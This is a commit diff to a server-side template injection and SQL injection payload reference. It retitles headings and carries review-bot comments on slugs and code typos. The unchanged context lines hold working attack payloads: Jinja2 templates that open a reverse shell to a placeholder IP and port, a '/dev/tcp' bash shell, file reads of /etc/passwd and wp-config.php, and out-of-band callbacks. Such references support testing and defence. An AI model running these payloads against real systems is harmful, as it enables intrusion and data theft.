
Commit 32d9f75

XPATH + XSS + XXE + XSLT
1 parent 8c09568 commit 32d9f75


15 files changed

+234
-200
lines changed

SQL Injection/Cassandra Injection.md

+4-4
@@ -6,8 +6,8 @@
66
## Summary
77

88
* [CQL Injection Limitations](#cql-injection-limitations)
9-
* [Cassandra comment](#cassandra-comment)
10-
* [Cassandra - Login Bypass](#cassandra---login-bypass)
9+
* [Cassandra Comment](#cassandra-comment)
10+
* [Cassandra Login Bypass](#cassandra-login-bypass)
1111
* [Example #1](#example-1)
1212
* [Example #2](#example-2)
1313
* [References](#references)
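Review bot: the TOC anchor for the login-bypass section changes from `#cassandra---login-bypass` to `#cassandra-login-bypass` because the heading drops its ` - ` separator; unlike the pure capitalization edits elsewhere in this commit, which leave the generated slug untouched, this one breaks any existing deep link to the old anchor. Worth grepping the rest of the repository for `cassandra---login-bypass` before merging, and the same check applies to the `#cassandra-comment` entry, whose slug happens to survive only because the old heading already had no dash.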
@@ -26,14 +26,14 @@
2626
* CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected.
2727

2828

29-
## Cassandra comment
29+
## Cassandra Comment
3030

3131
```sql
3232
/* Cassandra Comment */
3333
```
3434

3535

36-
## Cassandra - Login Bypass
36+
## Cassandra Login Bypass
3737

3838
### Example #1
3939

SQL Injection/DB2 Injection.md

-1
@@ -54,7 +54,6 @@
5454

5555
## DB2 Methodology
5656

57-
5857
| Description | SQL Query |
5958
| ---------------- | ------------------------------------ |
6059
| List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` |

Server Side Template Injection/ASP.md

+4-4
@@ -6,8 +6,8 @@
66
## Summary
77

88
- [ASP.NET Razor](#aspnet-razor)
9-
- [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection)
10-
- [ASP.NET Razor - Command execution](#aspnet-razor---command-execution)
9+
- [ASP.NET Razor - Basic Injection](#aspnet-razor---basic-injection)
10+
- [ASP.NET Razor - Command Execution](#aspnet-razor---command-execution)
1111
- [References](#references)
1212

1313

@@ -18,13 +18,13 @@
1818
> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.
1919
2020

21-
### ASP.NET Razor - Basic injection
21+
### ASP.NET Razor - Basic Injection
2222

2323
```powershell
2424
@(1+2)
2525
```
2626

27-
### ASP.NET Razor - Command execution
27+
### ASP.NET Razor - Command Execution
2828

2929
```csharp
3030
@{
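Review bot: while these headings are being touched, the `@(1+2)` block under "ASP.NET Razor - Basic Injection" is fenced as ```powershell although it is Razor syntax, whereas the command-execution block right below it is fenced as ```csharp; tagging both as `csharp` (or `cshtml`) keeps the highlighting consistent and stops a reader from pasting the probe into a PowerShell prompt.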

Server Side Template Injection/PHP.md

+10-10
@@ -8,13 +8,13 @@
88
- [Templating Libraries](#templating-libraries)
99
- [Smarty](#smarty)
1010
- [Twig](#twig)
11-
- [Twig - Basic injection](#twig---basic-injection)
12-
- [Twig - Template format](#twig---template-format)
11+
- [Twig - Basic Injection](#twig---basic-injection)
12+
- [Twig - Template Format](#twig---template-format)
1313
- [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
14-
- [Twig - Code execution](#twig---code-execution)
14+
- [Twig - Code Execution](#twig---code-execution)
1515
- [Latte](#latte)
16-
- [Latte - Basic injection](#latte---basic-injection)
17-
- [Latte - Code execution](#latte---code-execution)
16+
- [Latte - Basic Injection](#latte---basic-injection)
17+
- [Latte - Code Execution](#latte---code-execution)
1818
- [patTemplate](#pattemplate)
1919
- [PHPlib](#phplib-and-html_template_phplib)
2020
- [Plates](#plates)
@@ -53,7 +53,7 @@
5353
[Official website](https://twig.symfony.com/)
5454
> Twig is a modern template engine for PHP.
5555
56-
### Twig - Basic injection
56+
### Twig - Basic Injection
5757

5858
```python
5959
{{7*7}}
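Review bot: the `{{7*7}}` probe under "Twig - Basic Injection" is fenced as ```python, which highlights nothing useful for Twig syntax and misstates the target language; `twig` (or `html`) is the better tag, and the same applies to the other Twig blocks in this file that carry the python tag.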
@@ -63,7 +63,7 @@
6363
{{app.request.server.all|join(',')}}
6464
```
6565

66-
### Twig - Template format
66+
### Twig - Template Format
6767

6868
```python
6969
$output = $twig > render (
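Review bot: the context line `$output = $twig > render (` is not valid PHP: the object operator is `->` and there should be no space before the parenthesis, i.e. `$output = $twig->render(`. Since this hunk already edits the heading directly above it, fixing the snippet here avoids a separate typo commit.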
@@ -84,7 +84,7 @@ $output = $twig > render (
8484
{{include("wp-config.php")}}
8585
```
8686

87-
### Twig - Code execution
87+
### Twig - Code Execution
8888

8989
```python
9090
{{self}}
@@ -118,13 +118,13 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
118118

119119
## Latte
120120

121-
### Latte - Basic injection
121+
### Latte - Basic Injection
122122

123123
```php
124124
{var $X="POC"}{$X}
125125
```
126126

127-
### Latte - Code execution
127+
### Latte - Code Execution
128128

129129
```php
130130
{php system('nslookup oastify.com')}

Server Side Template Injection/Python.md

+36-36
@@ -7,29 +7,29 @@
77

88
- [Templating Libraries](#templating-libraries)
99
- [Django](#django)
10-
- [Django - Basic injection](#django---basic-injection)
11-
- [Django - Cross-site scripting](#django---cross-site-scripting)
12-
- [Django - Debug information leak](#django---debug-information-leak)
13-
- [Django - Leaking app's Secret Key](#django---leaking-apps-secret-key)
10+
- [Django - Basic Injection](#django---basic-injection)
11+
- [Django - Cross-Site Scripting](#django---cross-site-scripting)
12+
- [Django - Debug Information Leak](#django---debug-information-leak)
13+
- [Django - Leaking App's Secret Key](#django---leaking-apps-secret-key)
1414
- [Django - Admin Site URL leak](#django---admin-site-url-leak)
15-
- [Django - Admin username and password hash leak](#django---admin-username-and-password-hash-leak)
15+
- [Django - Admin Username and Password Hash Leak](#django---admin-username-and-password-hash-leak)
1616
- [Jinja2](#jinja2)
17-
- [Jinja2 - Basic injection](#jinja2---basic-injection)
18-
- [Jinja2 - Template format](#jinja2---template-format)
17+
- [Jinja2 - Basic Injection](#jinja2---basic-injection)
18+
- [Jinja2 - Template Format](#jinja2---template-format)
1919
- [Jinja2 - Debug Statement](#jinja2---debug-statement)
20-
- [Jinja2 - Dump all used classes](#jinja2---dump-all-used-classes)
21-
- [Jinja2 - Dump all config variables](#jinja2---dump-all-config-variables)
22-
- [Jinja2 - Read remote file](#jinja2---read-remote-file)
23-
- [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
20+
- [Jinja2 - Dump All Used Classes](#jinja2---dump-all-used-classes)
21+
- [Jinja2 - Dump All Config Variables](#jinja2---dump-all-config-variables)
22+
- [Jinja2 - Read Remote File](#jinja2---read-remote-file)
23+
- [Jinja2 - Write Into Remote File](#jinja2---write-into-remote-file)
2424
- [Jinja2 - Remote Command Execution](#jinja2---remote-command-execution)
25-
- [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
26-
- [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
27-
- [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
28-
- [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
29-
- [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file)
30-
- [Jinja2 - Filter bypass](#jinja2---filter-bypass)
25+
- [Forcing Output On Blind RCE](#jinja2---forcing-output-on-blind-rce)
26+
- [Exploit The SSTI By Calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
27+
- [Exploit The SSTI By Calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
28+
- [Exploit The SSTI By Calling Popen Without Guessing The Offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
29+
- [Exploit The SSTI By Writing an Evil Config File](#exploit-the-ssti-by-writing-an-evil-config-file)
30+
- [Jinja2 - Filter Bypass](#jinja2---filter-bypass)
3131
- [Tornado](#tornado)
32-
- [Tornado - Basic injection](#tornado---basic-injection)
32+
- [Tornado - Basic Injection](#tornado---basic-injection)
3333
- [Tornado - Remote Command Execution](#tornado---remote-command-execution)
3434
- [Mako](#mako)
3535
- [Mako - Remote Command Execution](#mako---remote-command-execution)
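Review bot: the retitling pass is incomplete in this list: `- [Django - Admin Site URL leak](#django---admin-site-url-leak)` keeps a lowercase "leak" while every neighbouring entry was moved to Title Case, and `- [Forcing Output On Blind RCE](#jinja2---forcing-output-on-blind-rce)` still lacks the `Jinja2 - ` prefix that its anchor (and the heading it points to) carry. Neither affects the generated slug, but both stand out once the rest of the list is uniform.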
@@ -54,7 +54,7 @@
5454

5555
Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.
5656

57-
### Django - Basic injection
57+
### Django - Basic Injection
5858

5959
```python
6060
{% csrf_token %} # Causes error with Jinja2
@@ -63,20 +63,20 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
6363
```
6464

6565

66-
### Django - Cross-site scripting
66+
### Django - Cross-Site Scripting
6767

6868
```python
6969
{{ '<script>alert(3)</script>' }}
7070
{{ '<script>alert(3)</script>' | safe }}
7171
```
7272

73-
### Django - Debug information leak
73+
### Django - Debug Information Leak
7474

7575
```python
7676
{% debug %}
7777
```
7878

79-
### Django - Leaking app’s Secret Key
79+
### Django - Leaking App's Secret Key
8080

8181
```python
8282
{{ messages.storages.0.signer.key }}
@@ -89,7 +89,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
8989
{% include 'admin/base.html' %}
9090
```
9191

92-
### Django - Admin username and password hash leak
92+
### Django - Admin Username And Password Hash Leak
9393

9494

9595
```
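Review bot: the new heading reads "Django - Admin Username And Password Hash Leak" while the TOC entry added in the same commit reads "Admin Username and Password Hash Leak"; the slug is identical either way, but pick one spelling of "and"/"And". The fence that follows (after two blank lines) also has no language tag, unlike the other Django blocks in this file, which use ```python.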
@@ -104,7 +104,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
104104
[Official website](https://jinja.palletsprojects.com/)
105105
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
106106
107-
### Jinja2 - Basic injection
107+
### Jinja2 - Basic Injection
108108

109109
```python
110110
{{4*4}}[[5*5]]
@@ -115,7 +115,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
115115
Jinja2 is used by Python Web Frameworks such as Django or Flask.
116116
The above injections have been tested on a Flask application.
117117

118-
### Jinja2 - Template format
118+
### Jinja2 - Template Format
119119

120120
```python
121121
{% extends "layout.html" %}
@@ -139,7 +139,7 @@ If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump
139139

140140
Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
141141

142-
### Jinja2 - Dump all used classes
142+
### Jinja2 - Dump All Used Classes
143143

144144
```python
145145
{{ [].class.base.subclasses() }}
@@ -153,7 +153,7 @@ Access `__globals__` and `__builtins__`:
153153
{{ self.__init__.__globals__.__builtins__ }}
154154
```
155155

156-
### Jinja2 - Dump all config variables
156+
### Jinja2 - Dump All Config Variables
157157

158158
```python
159159
{% for key, value in config.iteritems() %}
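Review bot: `config.iteritems()` in the context line is Python 2 only; on Python 3 (Flask 2.0 and later dropped Python 2 entirely) `dict.iteritems` does not exist and the template raises, so the loop should use `config.items()`, optionally keeping the old form as a note for legacy targets. A heading-only hunk is a cheap place to fold that correction in.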
@@ -162,7 +162,7 @@ Access `__globals__` and `__builtins__`:
162162
{% endfor %}
163163
```
164164

165-
### Jinja2 - Read remote file
165+
### Jinja2 - Read Remote File
166166

167167
```python
168168
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
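Review bot: the comment `''.__class__.__mro__[2].__subclasses__()[40] = File class` only holds on Python 2, where `str.__mro__` is `(str, basestring, object)`; on Python 3 it is `(str, object)`, so `__mro__[2]` raises IndexError and the `file` type no longer exists at all. Suggest stating that this snippet targets Python 2 and pointing readers to the `__builtins__.open(...)` variant already in this section for Python 3; the `[40]` index is interpreter and application dependent either way.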
@@ -172,7 +172,7 @@ Access `__globals__` and `__builtins__`:
172172
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
173173
```
174174

175-
### Jinja2 - Write into remote file
175+
### Jinja2 - Write Into Remote File
176176

177177
```python
178178
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
@@ -186,7 +186,7 @@ Listen for connection
186186
nc -lnvp 8000
187187
```
188188

189-
#### Jinja2 - Forcing output on blind RCE
189+
#### Jinja2 - Forcing Output On Blind RCE
190190

191191
You can import Flask functions to return an output from the vulnerable page.
192192

@@ -203,7 +203,7 @@ def hook(*args, **kwargs):
203203
```
204204

205205

206-
#### Exploit the SSTI by calling os.popen().read()
206+
#### Exploit The SSTI By Calling os.popen().read()
207207

208208
```python
209209
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
@@ -235,7 +235,7 @@ With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a pa
235235

236236
Source: https://twitter.com/podalirius_/status/1655970628648697860
237237

238-
#### Exploit the SSTI by calling subprocess.Popen
238+
#### Exploit The SSTI By Calling subprocess.Popen
239239

240240
:warning: the number 396 will vary depending of the application.
241241

@@ -244,7 +244,7 @@ Source: https://twitter.com/podalirius_/status/1655970628648697860
244244
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
245245
```
246246

247-
#### Exploit the SSTI by calling Popen without guessing the offset
247+
#### Exploit The SSTI By Calling Popen Without Guessing The Offset
248248

249249
```python
250250
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
@@ -257,7 +257,7 @@ In another GET parameter include a variable named "input" that contains the comm
257257
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
258258
```
259259

260-
#### Exploit the SSTI by writing an evil config file.
260+
#### Exploit The SSTI By Writing An Evil Config File
261261

262262
```python
263263
# evil config
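Review bot: the heading becomes "Exploit The SSTI By Writing An Evil Config File" but the matching TOC entry introduced earlier in this commit reads "... Writing an Evil Config File"; the slug `#exploit-the-ssti-by-writing-an-evil-config-file` is unaffected (the trailing period was never part of it), but the two strings should agree.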
@@ -270,7 +270,7 @@ In another GET parameter include a variable named "input" that contains the comm
270270
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
271271
```
272272

273-
### Jinja2 - Filter bypass
273+
### Jinja2 - Filter Bypass
274274

275275
```python
276276
request.__class__
@@ -313,7 +313,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http
313313

314314
## Tornado
315315

316-
### Tornado - Basic injection
316+
### Tornado - Basic Injection
317317

318318
```py
319319
{{7*7}}

Type Juggling/README.md

+5-5
@@ -6,8 +6,8 @@
66
## Summary
77

88
* [Loose Comparison](#loose-comparison)
9-
* [True statements](#true-statements)
10-
* [NULL statements](#null-statements)
9+
* [True Statements](#true-statements)
10+
* [NULL Statements](#null-statements)
1111
* [Loose Comparison](#loose-comparison)
1212
* [Magic Hashes](#magic-hashes)
1313
* [Methodology](#methodology)
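Review bot: `* [Loose Comparison](#loose-comparison)` appears twice in this summary, both copies pointing at the same anchor. If there really are two headings with that text, GitHub slugs the second one as `#loose-comparison-1` and the second link lands on the wrong section; if there is only one heading, the duplicate entry should be dropped while the list is being retitled.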
@@ -22,7 +22,7 @@
2222
- **Loose** comparison: using `== or !=` : both variables have "the same value".
2323
- **Strict** comparison: using `=== or !==` : both variables have "the same type and the same value".
2424

25-
### True statements
25+
### True Statements
2626

2727
| Statement | Output |
2828
| --------------------------------- |:---------------:|
@@ -44,7 +44,7 @@
4444
4545
![LooseTypeComparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png?raw=true)
4646

47-
Loose Type Comparisons occurs in many languages:
47+
Loose Type comparisons occurs in many languages:
4848

4949
* [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb)
5050
* [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql)
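Review bot: the rewritten sentence `Loose Type comparisons occurs in many languages:` still has the subject-verb disagreement of the original (`comparisons occur`), and lower-casing only "comparisons" while keeping "Loose Type" capitalized reads oddly; suggest `Loose type comparisons occur in many languages:`.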
@@ -56,7 +56,7 @@ Loose Type Comparisons occurs in many languages:
5656
* [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0)
5757

5858

59-
### NULL statements
59+
### NULL Statements
6060

6161
| Function | Statement | Output |
6262
| -------- | -------------------------- |:---------------:|
